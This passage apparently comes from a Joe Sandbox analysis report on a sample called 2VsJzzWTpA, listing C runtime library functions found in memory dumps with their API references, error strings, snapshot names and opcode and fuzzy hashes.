                • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
                • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
                Function 001BEC60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 001BECB1
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _invalid_parameter_noinfo.LIBCMT ref: 001BECBC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID: B
                • API String ID: 1812809483-1255198513
                • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                • Instruction ID: 4ab64148a078f30f592bfda4bf66d86ddaf9101564b499946e096a0180613029
                • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                • Instruction Fuzzy Hash: 31018472614B5486EB109F12D4447D9B6A1F7A9FE4F584325EF5817B95CF38C144CB00
                Function 0067F860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 0067F8B1
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _invalid_parameter_noinfo.LIBCMT ref: 0067F8BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID: B
                • API String ID: 1812809483-1255198513
                • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                • Instruction ID: 696ec82873bee636f2cfc17656ce8eca3729c8e3e8ee0a98847dae6747d9afc8
                • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                • Instruction Fuzzy Hash: 9001ADB2620B4086DB109F12E440799B662FB98FE4FA88325AF5C07BA5CF38C141CB04
                Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Unknown error, xrefs: 00401D2C
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-3474627141
                • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
                • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
                Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Overflow range error (OVERFLOW), xrefs: 00401D00
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4064033741
                • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
                • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2187435201
                • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
                • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
                Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Total loss of significance (TLOSS), xrefs: 00401D20
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4273532761
                • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
                • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
                Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Argument domain error (DOMAIN), xrefs: 00401CE0
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2713391170
                • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
                • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Partial loss of significance (PLOSS), xrefs: 00401CF0
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4283191376
                • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
                • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Argument singularity (SIGN), xrefs: 00401C78
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2468659920
                • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
                • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
                Function 001A10C4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • calloc.LIBCMT ref: 001A116A
                  • Part of subcall function 001CE208: _calloc_impl.LIBCMT ref: 001CE218
                  • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE22B
                  • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE235
                • free.LIBCMT ref: 001A12F3
                • free.LIBCMT ref: 001A12FD
                • free.LIBCMT ref: 001A130F
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_calloc_implcalloc
                • String ID:
                • API String ID: 4000150058-0
                • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                • Instruction ID: ef13a074418b6d296590a38f5d20f9b5ca4bc9d75961e5e567413d64bbd8a4b0
                • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                • Instruction Fuzzy Hash: 09C10C36608B859AD764CF65E88479EB7F4F789B88F10412AEB8D87B18DF38C555CB00
                Function 00661CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • calloc.LIBCMT ref: 00661D6A
                  • Part of subcall function 0068EE08: _calloc_impl.LIBCMT ref: 0068EE18
                  • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE2B
                  • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE35
                • free.LIBCMT ref: 00661EF3
                • free.LIBCMT ref: 00661EFD
                • free.LIBCMT ref: 00661F0F
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_calloc_implcalloc
                • String ID:
                • API String ID: 4000150058-0
                • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                • Instruction ID: 1a8b3b2cf1c52a6259925237e4e9cbc3425f2cca5b61c0d3a4cc04866f41f30a
                • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                • Instruction Fuzzy Hash: 18C13B32608B848AD760CF65E88039E77B5F789B88F14412AEF8D87B18EF39C555CB00
                Function 001BA144 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001BA178
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • free.LIBCMT ref: 001BA2BF
                • free.LIBCMT ref: 001BA323
                • free.LIBCMT ref: 001BA32F
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                • Instruction ID: 186e246a70f57c853be465db647510dd0cca896556ffc241b6b8c2dc239f5aab
                • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                • Instruction Fuzzy Hash: 5D51003130074582DE28AF22E8507ED63E2FBA5BC0F984429EE4A17B65EF79C502C701
                Function 0067AD44 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0067AD78
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • free.LIBCMT ref: 0067AEBF
                • free.LIBCMT ref: 0067AF23
                • free.LIBCMT ref: 0067AF2F
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$AllocHeap_callnewhmalloc
                • String ID:
                • API String ID: 3531731211-0
                • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                • Instruction ID: 4dfa9effe5ef590a14f708f6425d43e3cd84eb666ee08e0ad8d86dc367fc0050
                • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                • Instruction Fuzzy Hash: D751007630064582DA98ABA2D4503AD7393FBC4B80F54893AEE0E27B56EF7DC515C706
                Function 001A3700 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc
                • String ID:
                • API String ID: 2803490479-0
                • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                • Instruction ID: 77d767e9024fda2d898012a813aef0076d0c7132e078364397b5c0eabe0b130c
                • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                • Instruction Fuzzy Hash: 2C41BE7670078087CB18DF66E4107AE77A1F796B84F458625FE2A47B08EF38DA06C700
                Function 00664300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc
                • String ID:
                • API String ID: 2803490479-0
                • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                • Instruction ID: 530ed90c7799d936ae7596f3242aec9e382011cf7b4911ccbaf5d58aa51a8d27
                • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                • Instruction Fuzzy Hash: B541CA3230478087CB58DF66E411BAE73A2F784F88F548529EE6A87B05EF38D946C700
                Function 00671038 Relevance: 5.1, APIs: 4, Instructions: 109COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$CurrentProcessfreemalloc
                • String ID:
                • API String ID: 1397824077-0
                • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                • Instruction ID: e3c96e085606936993393d51645e5bd6fe23844c8dd89ffb8ca1b770db688147
                • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                • Instruction Fuzzy Hash: 52418372314A8186DB64DB26E4417AF63A3FB857D8F00942AEF8E4BB49EF3DC5418704